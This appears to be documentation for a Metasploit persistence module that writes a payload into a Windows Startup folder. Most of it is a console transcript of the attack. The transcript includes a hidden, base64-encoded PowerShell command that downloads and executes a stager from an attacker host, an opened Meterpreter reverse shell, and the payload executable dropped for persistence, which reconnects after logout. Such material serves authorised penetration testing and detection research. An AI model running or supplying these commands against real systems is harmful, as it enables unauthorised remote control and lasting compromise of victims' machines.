## Vulnerable Application This module establishes persistence by creating a payload in the user or system startup folder. Works on Vista and newer systems. ## Verification Steps Example steps in this format (is also in the PR): 1. get session on target with admin/system privs 2. `use exploit/windows/persistence/startup_folder` 3. `set payload ` 4. `set lport ` 5. `set lhost ` 6. `exploit` ## Options ### PAYLOAD_NAME Name of payload file to write. Random string as default. ### CONTEXT Target current User or All Users (system). Defaults to `USER`. Choices are `USER` which installs just to that user's startup folder. `SYSTEM` installs to the system default startup folder which effects all users. ## Scenarios ### Windows 10 1909 (10.0 Build 18363) Initial Payload ``` resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set target 2 target => 2 resource (/root/.msf4/msfconsole.rc)> set srvport 8085 srvport => 8085 resource (/root/.msf4/msfconsole.rc)> set uripath w2 uripath => w2 resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set lport 4449 lport => 4449 resource (/root/.msf4/msfconsole.rc)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4449 [*] Using URL: http://1.1.1.1:8085/w2 [*] Server started. [*] Run the following command on the target machine: powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABzAFIANAA0AEsAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAcwBSADQANABLAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAcwBSADQANABLAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwAyADAAdAB3AGYAZQAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA= msf exploit(multi/script/web_delivery) > [*] 2.2.2.2 web_delivery - Powershell command length: 3682 [*] 2.2.2.2 web_delivery - Delivering Payload (3682 bytes) [*] Sending stage (230982 bytes) to 2.2.2.2 [*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:50883) at 2025-10-27 15:10:44 -0400 msf exploit(multi/script/web_delivery) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : WIN10PROLICENSE OS : Windows 10 1909 (10.0 Build 18363). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > getuid Server username: WIN10PROLICENSE\windows meterpreter > background [*] Backgrounding session 1... ``` Persistence ``` msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/startup_folder [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf exploit(windows/persistence/startup_folder) > set session 1 session => 1 msf exploit(windows/persistence/startup_folder) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(windows/persistence/startup_folder) > recheck [*] Reloading module... [*] The target appears to be vulnerable. Likely exploitable, able to write test file to C:\Users\windows\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup msf exploit(windows/persistence/startup_folder) > exploit [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. msf exploit(windows/persistence/startup_folder) > [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Likely exploitable, able to write test file to C:\Users\windows\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup [+] Writing payload to C:\Users\windows\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zugyndszf.exe [*] Payload (7168 bytes) uploaded on WIN10PROLICENSE to C:\Users\windows\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zugyndszf.exe [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251027.1534/WIN10PROLICENSE_20251027.1534.rc ``` Logout and back in as user 'windows' ``` msf exploit(windows/persistence/startup_folder) > [*] 2.2.2.2 - Meterpreter session 1 closed. Reason: Died [*] Sending stage (188998 bytes) to 2.2.2.2 [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50916) at 2025-10-27 15:16:21 -0400 msf exploit(windows/persistence/startup_folder) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid Server username: WIN10PROLICENSE\windows ```